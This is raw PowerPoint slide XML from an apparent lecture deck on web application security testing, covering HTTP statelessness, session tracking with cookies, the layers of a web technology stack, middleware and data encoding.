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91" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="262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84" r:id="rId20"/>
    <p:sldId id="274" r:id="rId21"/>
    <p:sldId id="292" r:id="rId22"/>
    <p:sldId id="275" r:id="rId23"/>
    <p:sldId id="279" r:id="rId24"/>
    <p:sldId id="276" r:id="rId25"/>
    <p:sldId id="280" r:id="rId26"/>
    <p:sldId id="277" r:id="rId27"/>
    <p:sldId id="293" r:id="rId28"/>
    <p:sldId id="294" r:id="rId29"/>
    <p:sldId id="281" r:id="rId30"/>
    <p:sldId id="295" r:id="rId31"/>
    <p:sldId id="282" r:id="rId32"/>
    <p:sldId id="283" r:id="rId33"/>
    <p:sldId id="285" r:id="rId34"/>
    <p:sldId id="288" r:id="rId35"/>
    <p:sldId id="289" r:id="rId36"/>
    <p:sldId id="287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298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DAC8A-555A-457A-8CCA-76C07868036C}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>20-04-2017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B1F47-FBB3-423A-A78B-C78791DFC9F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71E91E0-5095-4644-ACD6-6664C0707604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marco " -- "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CE1DB00-DA0F-494C-9F31-0C874242F9FC}" type="slidenum">
              <a:rPr lang="en-US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7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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6CF-CB5D-4CC5-A3B6-A4D391A2DC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7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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6CF-CB5D-4CC5-A3B6-A4D391A2DC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7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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6CF-CB5D-4CC5-A3B6-A4D391A2DC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7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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6CF-CB5D-4CC5-A3B6-A4D391A2DC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7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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6CF-CB5D-4CC5-A3B6-A4D391A2DC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7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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6CF-CB5D-4CC5-A3B6-A4D391A2DC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7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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6CF-CB5D-4CC5-A3B6-A4D391A2DC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7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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6CF-CB5D-4CC5-A3B6-A4D391A2DC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7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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6CF-CB5D-4CC5-A3B6-A4D391A2DC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7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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6CF-CB5D-4CC5-A3B6-A4D391A2DC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7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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96CF-CB5D-4CC5-A3B6-A4D391A2DCC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F7E2B-3DB9-4948-9519-B4A6B2E96441}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>20-04-2017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96CF-CB5D-4CC5-A3B6-A4D391A2DCC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hyperlink" Target="http://fred:wilma@www.example.com/private.asp?doc=3&amp;part=4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suif.stanford.edu/~livshits/work/lapse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3829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portswigger.net/suite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security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php-ids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Application </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security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IN" sz="1800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP is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stateless Protocol does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not have any notion of “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state” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="720725" lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="18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connection has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no relationship to any other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connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="720725" lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If you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click on a link now, and then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click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on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another link ten minutes later (or even one second later), the server has no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concept that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the same person made those two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requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Applications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go through a lot of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trouble to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establish who is doing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what</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Programmer has to build the application itself to manage the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session and determining that one connection is related to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another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP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address: Also not allowing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the server to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figure out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that all the connections from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 same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IP address must be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related </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Many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households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have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several computers, but one link to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Internet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gets only a single IP address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, and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 device in the network (a router of some kind) uses a trick called Network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Address Translation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(NAT) to hide how many computers are using that same IP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address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cookies-To track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session and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state,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become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 focal point for a lot of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testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Failures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to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track session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and state correctly are the root cause of many security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issues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HTTP is simple text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>look at the actual messages that pass over the wire (or the air) and see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>exactly what’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>going </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>easy to capture HTTP, and it’s very easy for humans to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>interpret it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>and understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>importantly, because it is so simple, it is very easy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>to simulate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>requests, Regardless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>of whether the usual application is a web browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>player, PDF reader, or something else, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>can simulate those requests using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>any client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Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>applications </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Might </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>be a single server, using a really lightweight </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>scripting language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>to send various kinds of reports to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Or might </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>be a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>massive business-to-business </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(B2B) workflow system processing a million orders and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>invoices every hour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>consist of the same sorts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>of moving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>parts, and they rearrange those parts in different ways to suit their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>needs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Building Blocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>The technology stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Data Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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technology stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>For any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>application, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>consider a set of technologies that are typically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>described as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>the lowest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>level: An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>operating system </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Providing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>primitive operations like reading and writing files and network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>communications</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Above that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>software </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Accepts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>HTTP connections, parses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>determines how to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>respond</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Above </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>amount </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>of logic </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>To think </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>the input and ultimately determines the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>output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1521" y="1990724"/>
            <a:ext cx="6392847" cy="40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Network services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>typically implemented by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>developers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>software, external </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>network services can have a vital impact on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Include load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>balancers, application firewalls, and various devices that route the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>packets over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>the network to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>the server</a:t>
            </a:r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Operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Play </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>important role in things like connection time-outs, antivirus testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>data storage (e.g., the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>filesystem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Easy to attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>mysterious behavior to an application failure, when really it is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>operating system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>behaving in an unexpected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>way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HTTP server software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Some software must run in the operating system and listen for HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>connections</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>E.g. IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, Apache, Jetty, Tomcat, or any number of other server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>packages</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>the operating system, its behavior can influence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>and sometimes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>misunderstood</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>can perform user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>ID and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>password checking, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>one can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>configure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>server software to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>perform that function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Knowing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>where that function is performed is important </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>to interpreting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>the results of a user ID and password test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>case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Middleware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A very big and broad category, middleware can comprise just about any sort </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>of software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>that is somewhere between the server and the business </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Typical names </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>here include various runtime environments (.NET and J2EE) as well </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>as commercial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>products like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>WebLogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSphere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usual reason for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>incorporating middleware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>into a software’s design is functionality that is more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>sophisticated than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>the server software, upon which you can build your business </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>logic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Data Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>applications ship </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>data back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>and forth from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Depending </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>data, the requirements of the system, and the programmer’s particular preferences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>might be encoded or packaged in any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>no. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>of different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>To make useful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>test cases, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>have to decode the data, manipulate it, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1"/>
              <a:t>reencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
